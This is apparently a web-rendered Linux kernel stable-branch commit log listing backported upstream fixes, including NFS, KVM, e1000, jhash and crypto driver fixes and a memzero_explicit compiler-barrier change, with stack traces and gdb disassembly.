      Signed-off-by: default avatarMark Brown <broonie@kernel.org>
      Signed-off-by: default avatarWolfram Sang <wsa@the-dreams.de>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      bccbeee0
    • Andrew Elble's avatar
      NFS: fix BUG() crash in notify_change() with patch to chown_common() · 54135205
      Andrew Elble authored
      commit c1b8940b upstream.
      
      We have observed a BUG() crash in fs/attr.c:notify_change(). The crash
      occurs during an rsync into a filesystem that is exported via NFS.
      
      1.) fs/attr.c:notify_change() modifies the caller's version of attr.
      2.) 6de0ec00 ("VFS: make notify_change pass ATTR_KILL_S*ID to
          setattr operations") introduced a BUG() restriction such that "no
          function will ever call notify_change() with both ATTR_MODE and
          ATTR_KILL_S*ID set". Under some circumstances though, it will have
          assisted in setting the caller's version of attr to this very
          combination.
      3.) 27ac0ffe ("locks: break delegations on any attribute
          modification") introduced code to handle breaking
          delegations. This can result in notify_change() being re-called. attr
          _must_ be explicitly reset to avoid triggering the BUG() established
          in #2.
      4.) The path that that triggers this is via fs/open.c:chmod_common().
          The combination of attr flags set here and in the first call to
          notify_change() along with a later failed break_deleg_wait()
          results in notify_change() being called again via retry_deleg
          without resetting attr.
      
      Solution is to move retry_deleg in chmod_common() a bit further up to
      ensure attr is completely reset.
      
      There are other places where this seemingly could occur, such as
      fs/utimes.c:utimes_common(), but the attr flags are not initially
      set in such a way to trigger this.
      
      Fixes: 27ac0ffe ("locks: break delegations on any attribute modification")
      Reported-by: default avatarEric Meddaugh <etmsys@rit.edu>
      Tested-by: default avatarEric Meddaugh <etmsys@rit.edu>
      Signed-off-by: default avatarAndrew Elble <aweits@rit.edu>
      Signed-off-by: default avatarAl Viro <viro@zeniv.linux.org.uk>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      54135205
    • Dave Olson's avatar
      powerpc: Fix missing L2 cache size in /sys/devices/system/cpu · a760d7cb
      Dave Olson authored
      commit f7e9e358 upstream.
      
      This problem appears to have been introduced in 2.6.29 by commit
      93197a36 "Rewrite sysfs processor cache info code".
      
      This caused lscpu to error out on at least e500v2 devices, eg:
      
        error: cannot open /sys/devices/system/cpu/cpu0/cache/index2/size: No such file or directory
      
      Some embedded powerpc systems use cache-size in DTS for the unified L2
      cache size, not d-cache-size, so we need to allow for both DTS names.
      Added a new CACHE_TYPE_UNIFIED_D cache_type_info structure to handle
      this.
      
      Fixes: 93197a36 ("powerpc: Rewrite sysfs processor cache info code")
      Signed-off-by: default avatarDave Olson <olson@cumulusnetworks.com>
      Signed-off-by: default avatarMichael Ellerman <mpe@ellerman.id.au>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      a760d7cb
    • Radim Krčmář's avatar
      KVM: use slowpath for cross page cached accesses · 26456762
      Radim Krčmář authored
      commit ca3f0874 upstream.
      
      kvm_write_guest_cached() does not mark all written pages as dirty and
      code comments in kvm_gfn_to_hva_cache_init() talk about NULL memslot
      with cross page accesses.  Fix all the easy way.
      
      The check is '<= 1' to have the same result for 'len = 0' cache anywhere
      in the page.  (nr_pages_needed is 0 on page boundary.)
      
      Fixes: 8f964525 ("KVM: Allow cross page reads and writes from cached translations.")
      Signed-off-by: default avatarRadim Krčmář <rkrcmar@redhat.com>
      Message-Id: <20150408121648.GA3519@potion.brq.redhat.com>
      Reviewed-by: default avatarWanpeng Li <wanpeng.li@linux.intel.com>
      Signed-off-by: default avatarPaolo Bonzini <pbonzini@redhat.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      26456762
    • Alexander Duyck's avatar
      jhash: Update jhash_[321]words functions to use correct initval · 516430eb
      Alexander Duyck authored
      commit 2e7056c4 upstream.
      
      Looking over the implementation for jhash2 and comparing it to jhash_3words
      I realized that the two hashes were in fact very different.  Doing a bit of
      digging led me to "The new jhash implementation" in which lookup2 was
      supposed to have been replaced with lookup3.
      
      In reviewing the patch I noticed that jhash2 had originally initialized a
      and b to JHASH_GOLDENRATIO and c to initval, but after the patch a, b, and
      c were initialized to initval + (length << 2) + JHASH_INITVAL.  However the
      changes in jhash_3words simply replaced the initialization of a and b with
      JHASH_INITVAL.
      
      This change corrects what I believe was an oversight so that a, b, and c in
      jhash_3words all have the same value added consisting of initval + (length
      << 2) + JHASH_INITVAL so that jhash2 and jhash_3words will now produce the
      same hash result given the same inputs.
      
      Fixes: 60d509c8 ("The new jhash implementation")
      Signed-off-by: default avatarAlexander Duyck <alexander.h.duyck@redhat.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      516430eb
    • Vutla, Lokesh's avatar
      crypto: omap-aes - Fix support for unequal lengths · 4b6e84d6
      Vutla, Lokesh authored
      commit 6d7e7e02 upstream.
      
      For cases where total length of an input SGs is not same as
      length of the input data for encryption, omap-aes driver
      crashes. This happens in the case when IPsec is trying to use
      omap-aes driver.
      
      To avoid this, we copy all the pages from the input SG list
      into a contiguous buffer and prepare a single element SG list
      for this buffer with length as the total bytes to crypt, which is
      similar thing that is done in case of unaligned lengths.
      
      Fixes: 6242332f ("crypto: omap-aes - Add support for cases of unaligned lengths")
      Signed-off-by: default avatarLokesh Vutla <lokeshvutla@ti.com>
      Signed-off-by: default avatarHerbert Xu <herbert@gondor.apana.org.au>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      4b6e84d6
    • Nishanth Menon's avatar
      C6x: time: Ensure consistency in __init · e7732475
      Nishanth Menon authored
      commit f4831605 upstream.
      
      time_init invokes timer64_init (which is __init annotation)
      since all of these are invoked at init time, lets maintain
      consistency by ensuring time_init is marked appropriately
      as well.
      
      This fixes the following warning with CONFIG_DEBUG_SECTION_MISMATCH=y
      
      WARNING: vmlinux.o(.text+0x3bfc): Section mismatch in reference from the function time_init() to the function .init.text:timer64_init()
      The function time_init() references
      the function __init timer64_init().
      This is often because time_init lacks a __init
      annotation or the annotation of timer64_init is wrong.
      
      Fixes: 546a3954 ("C6X: time management")
      Signed-off-by: default avatarNishanth Menon <nm@ti.com>
      Signed-off-by: default avatarMark Salter <msalter@redhat.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      e7732475
    • Junjie Mao's avatar
      driver core: bus: Goto appropriate labels on failure in bus_add_device · f7fe3687
      Junjie Mao authored
      commit 1c34203a upstream.
      
      It is not necessary to call device_remove_groups() when device_add_groups()
      fails.
      
      The group added by device_add_groups() should be removed if sysfs_create_link()
      fails.
      
      Fixes: fa6fdb33 ("driver core: bus_type: add dev_groups")
      Signed-off-by: default avatarJunjie Mao <junjie_mao@yeah.net>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      f7fe3687
    • mancha security's avatar
      lib: memzero_explicit: use barrier instead of OPTIMIZER_HIDE_VAR · 99c5da5e
      mancha security authored
      commit 0b053c95 upstream.
      
      OPTIMIZER_HIDE_VAR(), as defined when using gcc, is insufficient to
      ensure protection from dead store optimization.
      
      For the random driver and crypto drivers, calls are emitted ...
      
        $ gdb vmlinux
        (gdb) disassemble memzero_explicit
        Dump of assembler code for function memzero_explicit:
          0xffffffff813a18b0 <+0>:	push   %rbp
          0xffffffff813a18b1 <+1>:	mov    %rsi,%rdx
          0xffffffff813a18b4 <+4>:	xor    %esi,%esi
          0xffffffff813a18b6 <+6>:	mov    %rsp,%rbp
          0xffffffff813a18b9 <+9>:	callq  0xffffffff813a7120 <memset>
          0xffffffff813a18be <+14>:	pop    %rbp
          0xffffffff813a18bf <+15>:	retq
        End of assembler dump.
      
        (gdb) disassemble extract_entropy
        [...]
          0xffffffff814a5009 <+313>:	mov    %r12,%rdi
          0xffffffff814a500c <+316>:	mov    $0xa,%esi
          0xffffffff814a5011 <+321>:	callq  0xffffffff813a18b0 <memzero_explicit>
          0xffffffff814a5016 <+326>:	mov    -0x48(%rbp),%rax
        [...]
      
      ... but in case in future we might use facilities such as LTO, then
      OPTIMIZER_HIDE_VAR() is not sufficient to protect gcc from a possible
      eviction of the memset(). We have to use a compiler barrier instead.
      
      Minimal test example when we assume memzero_explicit() would *not* be
      a call, but would have been *inlined* instead:
      
        static inline void memzero_explicit(void *s, size_t count)
        {
          memset(s, 0, count);
          <foo>
        }
      
        int main(void)
        {
          char buff[20];
      
          snprintf(buff, sizeof(buff) - 1, "test");
          printf("%s", buff);
      
          memzero_explicit(buff, sizeof(buff));
          return 0;
        }
      
      With <foo> := OPTIMIZER_HIDE_VAR():
      
        (gdb) disassemble main
        Dump of assembler code for function main:
        [...]
         0x0000000000400464 <+36>:	callq  0x400410 <printf@plt>
         0x0000000000400469 <+41>:	xor    %eax,%eax
         0x000000000040046b <+43>:	add    $0x28,%rsp
         0x000000000040046f <+47>:	retq
        End of assembler dump.
      
      With <foo> := barrier():
      
        (gdb) disassemble main
        Dump of assembler code for function main:
        [...]
         0x0000000000400464 <+36>:	callq  0x400410 <printf@plt>
         0x0000000000400469 <+41>:	movq   $0x0,(%rsp)
         0x0000000000400471 <+49>:	movq   $0x0,0x8(%rsp)
         0x000000000040047a <+58>:	movl   $0x0,0x10(%rsp)
         0x0000000000400482 <+66>:	xor    %eax,%eax
         0x0000000000400484 <+68>:	add    $0x28,%rsp
         0x0000000000400488 <+72>:	retq
        End of assembler dump.
      
      As can be seen, movq, movq, movl are being emitted inlined
      via memset().
      
      Reference: http://thread.gmane.org/gmane.linux.kernel.cryptoapi/13764/
      Fixes: d4c5efdb ("random: add and use memzero_explicit() for clearing data")
      Cc: Theodore Ts'o <tytso@mit.edu>
      Signed-off-by: default avatarmancha security <mancha1@zoho.com>
      Signed-off-by: default avatarDaniel Borkmann <daniel@iogearbox.net>
      Acked-by: default avatarHannes Frederic Sowa <hannes@stressinduktion.org>
      Acked-by: default avatarStephan Mueller <smueller@chronox.de>
      Signed-off-by: default avatarHerbert Xu <herbert@gondor.apana.org.au>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      99c5da5e
    • Nicolas Iooss's avatar
      wl18xx: show rx_frames_per_rates as an array as it really is · ca654131
      Nicolas Iooss authored
      commit a3fa71c4 upstream.
      
      In struct wl18xx_acx_rx_rate_stat, rx_frames_per_rates field is an
      array, not a number.  This means WL18XX_DEBUGFS_FWSTATS_FILE can't be
      used to display this field in debugfs (it would display a pointer, not
      the actual data).  Use WL18XX_DEBUGFS_FWSTATS_FILE_ARRAY instead.
      
      This bug has been found by adding a __printf attribute to
      wl1271_format_buffer.  gcc complained about "format '%u' expects
      argument of type 'unsigned int', but argument 5 has type 'u32 *'".
      
      Fixes: c5d94169 ("wl18xx: use new fw stats structures")
      Signed-off-by: default avatarNicolas Iooss <nicolas.iooss_linux@m4x.org>
      Signed-off-by: default avatarKalle Valo <kvalo@codeaurora.org>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      ca654131
    • Sabrina Dubroca's avatar
      e1000: add dummy allocator to fix race condition between mtu change and netpoll · b29d9b81
      Sabrina Dubroca authored
      commit 08e83316 upstream.
      
      There is a race condition between e1000_change_mtu's cleanups and
      netpoll, when we change the MTU across jumbo size:
      
      Changing MTU frees all the rx buffers:
          e1000_change_mtu -> e1000_down -> e1000_clean_all_rx_rings ->
              e1000_clean_rx_ring
      
      Then, close to the end of e1000_change_mtu:
          pr_info -> ... -> netpoll_poll_dev -> e1000_clean ->
              e1000_clean_rx_irq -> e1000_alloc_rx_buffers -> e1000_alloc_frag
      
      And when we come back to do the rest of the MTU change:
          e1000_up -> e1000_configure -> e1000_configure_rx ->
              e1000_alloc_jumbo_rx_buffers
      
      alloc_jumbo finds the buffers already != NULL, since data (shared with
      page in e1000_rx_buffer->rxbuf) has been re-alloc'd, but it's garbage,
      or at least not what is expected when in jumbo state.
      
      This results in an unusable adapter (packets don't get through), and a
      NULL pointer dereference on the next call to e1000_clean_rx_ring
      (other mtu change, link down, shutdown):
      
      BUG: unable to handle kernel NULL pointer dereference at           (null)
      IP: [<ffffffff81194d6e>] put_compound_page+0x7e/0x330
      
          [...]
      
      Call Trace:
       [<ffffffff81195445>] put_page+0x55/0x60
       [<ffffffff815d9f44>] e1000_clean_rx_ring+0x134/0x200
       [<ffffffff815da055>] e1000_clean_all_rx_rings+0x45/0x60
       [<ffffffff815df5e0>] e1000_down+0x1c0/0x1d0
       [<ffffffff811e2260>] ? deactivate_slab+0x7f0/0x840
       [<ffffffff815e21bc>] e1000_change_mtu+0xdc/0x170
       [<ffffffff81647050>] dev_set_mtu+0xa0/0x140
       [<ffffffff81664218>] do_setlink+0x218/0xac0
       [<ffffffff814459e9>] ? nla_parse+0xb9/0x120
       [<ffffffff816652d0>] rtnl_newlink+0x6d0/0x890
       [<ffffffff8104f000>] ? kvm_clock_read+0x20/0x40
       [<ffffffff810a2068>] ? sched_clock_cpu+0xa8/0x100
       [<ffffffff81663802>] rtnetlink_rcv_msg+0x92/0x260
      
      By setting the allocator to a dummy version, netpoll can't mess up our
      rx buffers.  The allocator is set back to a sane value in
      e1000_configure_rx.
      
      Fixes: edbbb3ca ("e1000: implement jumbo receive with partial descriptors")
      Signed-off-by: default avatarSabrina Dubroca <sd@queasysnail.net>
      Tested-by: default avatarAaron Brown <aaron.f.brown@intel.com>
      Signed-off-by: default avatarJeff Kirsher <jeffrey.t.kirsher@intel.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      b29d9b81
    • Jeff Layton's avatar
      nfs: fix high load average due to callback thread sleeping · f09a1ad6
      Jeff Layton authored
      commit 5d05e54a upstream.
      
      Chuck pointed out a problem that crept in with commit 6ffa30d3 (nfs:
      don't call blocking operations while !TASK_RUNNING). Linux counts tasks
      in uninterruptible sleep against the load average, so this caused the
      system's load average to be pinned at at least 1 when there was a
      NFSv4.1+ mount active.
      
      Not a huge problem, but it's probably worth fixing before we get too
      many complaints about it. This patch converts the code back to use
      TASK_INTERRUPTIBLE sleep, simply has it flush any signals on each loop
      iteration. In practice no one should really be signalling this thread at
      all, so I think this is reasonably safe.
      
      With this change, there's also no need to game the hung task watchdog so
      we can also convert the schedule_timeout call back to a normal schedule.
      Reported-by: default avatarChuck Lever <chuck.lever@oracle.com>
      Signed-off-by: default avatarJeff Layton <jeff.layton@primarydata.com>
      Tested-by: default avatarChuck Lever <chuck.lever@oracle.com>
      Fixes: commit 6ffa30d3 (“nfs: don't call blocking . . .”)
      Signed-off-by: default avatarTrond Myklebust <trond.myklebust@primarydata.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      f09a1ad6
    • Jeff Layton's avatar
      nfs: don't call blocking operations while !TASK_RUNNING · d6cfb99d
      Jeff Layton authored
      commit 6ffa30d3 upstream.
      
      Bruce reported seeing this warning pop when mounting using v4.1:
      
           ------------[ cut here ]------------
           WARNING: CPU: 1 PID: 1121 at kernel/sched/core.c:7300 __might_sleep+0xbd/0xd0()
          do not call blocking ops when !TASK_RUNNING; state=1 set at [<ffffffff810ff58f>] prepare_to_wait+0x2f/0x90
          Modules linked in: rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace sunrpc fscache ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack iptable_mangle iptable_security iptable_raw snd_hda_codec_generic snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm snd_timer ppdev joydev snd virtio_console virtio_balloon pcspkr serio_raw parport_pc parport pvpanic floppy soundcore i2c_piix4 virtio_blk virtio_net qxl drm_kms_helper ttm drm virtio_pci virtio_ring ata_generic virtio pata_acpi
          CPU: 1 PID: 1121 Comm: nfsv4.1-svc Not tainted 3.19.0-rc4+ #25
          Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140709_153950- 04/01/2014
           0000000000000000 000000004e5e3f73 ffff8800b998fb48 ffffffff8186ac78
           0000000000000000 ffff8800b998fba0 ffff8800b998fb88 ffffffff810ac9da
           ffff8800b998fb68 ffffffff81c923e7 00000000000004d9 0000000000000000
          Call Trace:
           [<ffffffff8186ac78>] dump_stack+0x4c/0x65
           [<ffffffff810ac9da>] warn_slowpath_common+0x8a/0xc0
           [<ffffffff810aca65>] warn_slowpath_fmt+0x55/0x70
           [<ffffffff810ff58f>] ? prepare_to_wait+0x2f/0x90
           [<ffffffff810ff58f>] ? prepare_to_wait+0x2f/0x90
           [<ffffffff810dd2ad>] __might_sleep+0xbd/0xd0
           [<ffffffff8124c973>] kmem_cache_alloc_trace+0x243/0x430
           [<ffffffff810d941e>] ? groups_alloc+0x3e/0x130
           [<ffffffff810d941e>] groups_alloc+0x3e/0x130
           [<ffffffffa0301b1e>] svcauth_unix_accept+0x16e/0x290 [sunrpc]
           [<ffffffffa0300571>] svc_authenticate+0xe1/0xf0 [sunrpc]
           [<ffffffffa02fc564>] svc_process_common+0x244/0x6a0 [sunrpc]
           [<ffffffffa02fd044>] bc_svc_process+0x1c4/0x260 [sunrpc]
           [<ffffffffa03d5478>] nfs41_callback_svc+0x128/0x1f0 [nfsv4]
           [<ffffffff810ff970>] ? wait_woken+0xc0/0xc0
           [<ffffffffa03d5350>] ? nfs4_callback_svc+0x60/0x60 [nfsv4]
           [<ffffffff810d45bf>] kthread+0x11f/0x140
           [<ffffffff810ea815>] ? local_clock+0x15/0x30
           [<ffffffff810d44a0>] ? kthread_create_on_node+0x250/0x250
           [<ffffffff81874bfc>] ret_from_fork+0x7c/0xb0
           [<ffffffff810d44a0>] ? kthread_create_on_node+0x250/0x250
          ---[ end trace 675220a11e30f4f2 ]---
      
      nfs41_callback_svc does most of its work while in TASK_INTERRUPTIBLE,
      which is just wrong. Fix that by finishing the wait immediately if we've
      found that the list has something on it.
      
      Also, we don't expect this kthread to accept signals, so we should be
      using a TASK_UNINTERRUPTIBLE sleep instead. That however, opens us up
      hung task warnings from the watchdog, so have the schedule_timeout
      wake up every 60s if there's no callback activity.
      Reported-by: default avatar"J. Bruce Fields" <bfields@fieldses.org>
      Signed-off-by: default avatarJeff Layton <jlayton@primarydata.com>
      Signed-off-by: default avatarTrond Myklebust <trond.myklebust@primarydata.com>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      d6cfb99d
    • Len Brown's avatar
      sched/idle/x86: Restore mwait_idle() to fix boot hangs, to improve power... · 1f766656
      Len Brown authored
      sched/idle/x86: Restore mwait_idle() to fix boot hangs, to improve power savings and to improve performance
      
      commit b253149b upstream.
      
      In Linux-3.9 we removed the mwait_idle() loop:
      
        69fb3676 ("x86 idle: remove mwait_idle() and "idle=mwait" cmdline param")
      
      The reasoning was that modern machines should be sufficiently
      happy during the boot process using the default_idle() HALT
      loop, until cpuidle loads and either acpi_idle or intel_idle
      invoke the newer MWAIT-with-hints idle loop.
      
      But two machines reported problems:
      
       1. Certain Core2-era machines support MWAIT-C1 and HALT only.
          MWAIT-C1 is preferred for optimal power and performance.
          But if they support just C1, cpuidle never loads and
          so they use the boot-time default idle loop forever.
      
       2. Some laptops will boot-hang if HALT is used,
          but will boot successfully if MWAIT is used.
          This appears to be a hidden assumption in BIOS SMI,
          that is presumably valid on the proprietary OS
          where the BIOS was validated.
      
             https://bugzilla.kernel.org/show_bug.cgi?id=60770
      
      So here we effectively revert the patch above, restoring
      the mwait_idle() loop.  However, we don't bother restoring
      the idle=mwait cmdline parameter, since it appears to add
      no value.
      
      Maintainer notes:
      
        For 3.9, simply revert 69fb3676
        for 3.10, patch -F3 applies, fuzz needed due to __cpuinit use in
        context For 3.11, 3.12, 3.13, this patch applies cleanly
      Tested-by: default avatarMike Galbraith <bitbucket@online.de>
      Signed-off-by: default avatarLen Brown <len.brown@intel.com>
      Acked-by: default avatarMike Galbraith <bitbucket@online.de>
      Cc: Borislav Petkov <bp@alien8.de>
      Cc: H. Peter Anvin <hpa@zytor.com>
      Cc: Ian Malone <ibmalone@gmail.com>
      Cc: Josh Boyer <jwboyer@redhat.com>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Cc: Mike Galbraith <efault@gmx.de>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Thomas Gleixner <tglx@linutronix.de>
      Link: http://lkml.kernel.org/r/345254a551eb5a6a866e048d7ab570fd2193aca4.1389763084.git.len.brown@intel.com
      [ Ported to recent kernels. ]
      [ Mike: 3.10 backport ]
      Signed-off-by: default avatarIngo Molnar <mingo@kernel.org>
      Signed-off-by: default avatarMike Galbraith <efault@gmx.de>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      Signed-off-by: default avatarKamal Mostafa <kamal@canonical.com>
      1f766656